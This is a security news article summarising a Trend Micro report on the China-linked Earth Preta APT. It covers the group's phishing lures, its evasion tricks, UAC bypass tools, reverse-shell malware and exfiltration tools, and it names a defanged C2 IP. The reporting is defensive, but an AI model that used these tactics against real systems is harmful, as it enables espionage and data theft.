Technical analysis of China-linked Earth Preta APT’s infection chain

China-linked Earth Preta cyberespionage group has been observed adopting new techniques to bypass security solutions.

Trend Micro researchers reported that the China-linked Earth Preta group (aka Mustang Panda) is actively changing its tools, tactics, and procedures (TTPs) to bypass security solutions.

Earth Preta, also known as “RedDelta” or “Bronze President,” has been active since at least 2012, it targeted American and European entities such as government organizations, think tanks, NGOs, and even Catholic organizations at the Vatican. Past campaigns were focused on Asian countries, including Taiwan, Hong Kong, Mongolia, Tibet, and Myanmar.

In recent campaigns, threat actors used European Union reports on the conflict in Ukraine and Ukrainian government reports as lures. Upon opening the reports, the infection process starts leading to the deployment of malware on the victim’s system.

In a recent campaign analyzed by Trend Micro, the threat actors used spear-phishing emails and Google Drive links as attack vectors.

A deep investigation into the campaign revealed several undisclosed malware and interesting data exfiltration tools used by the group.

The researchers categorized the infection chain into six stages: arrival vectors, discovery, privilege escalation, lateral movement, command and control (C&C) and exfiltration, respectively.

The attackers used DLL sideloading, shortcut links, and fake file extensions in the first part of the attacks, the researchers noticed that starting in October and November 2022, the group began changing their TTPs to deploy the TONEINS, TONESHELL, and PUBLOAD malware.

TONEINS and TONESHELL malware was downloaded from the Google Drive link embedded in the body of spear-phishing messages. To bypass email-scanning services, the threat actors started embedding the Google Drive link in a lure document. The link points to a password-protected archive, the document also includes the password.

“Based on our observations, Earth Preta tends to hide malicious payloads in fake files, disguising them as legitimate ones — a technique that has been proven effective for avoiding detection. As for privilege escalation, the threat actors tend to reuse codes copied from open-source repositories.” states the report published by Trend Micro. “Meanwhile, they developed customized toolsets designed to collect confidential documents in the exfiltration stage.”

Once gained a foothold in the target network, the attackers start the discovery and privileges escalation phases. In the privilege escalation phase the threat actors used several tools for UAC bypass in Windows 10 such as ABPASS and CCPASS.

During the lateral movement phase, Earth Preta used malware such as HIUPAN and ACNSHELL being used to install themselves to removable disks and create a reverse shell.

The group used several tools and commands for the C2 stage, such as certutil.exe to download the legitimate WinRAR binary and PowerShell to download multiple malicious archives from a remote server (103[.]159[.]132[.]181).

The group also used the CLEXEC backdoor, the COOLCLIENT and TROCLIENT implants, and the PlugX malware.

The report details the execution flow for each of the above malware.

The threat actors also used highly customized tools for exfiltration, such as NUPAKAGE and ZPAKAGE, both used to steal Office documents.

“Earth Preta is a capable and organized threat actor that is continuously honing its TTPs, strengthening its development capabilities, and building a versatile arsenal of tools and malware,” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Earth Preta)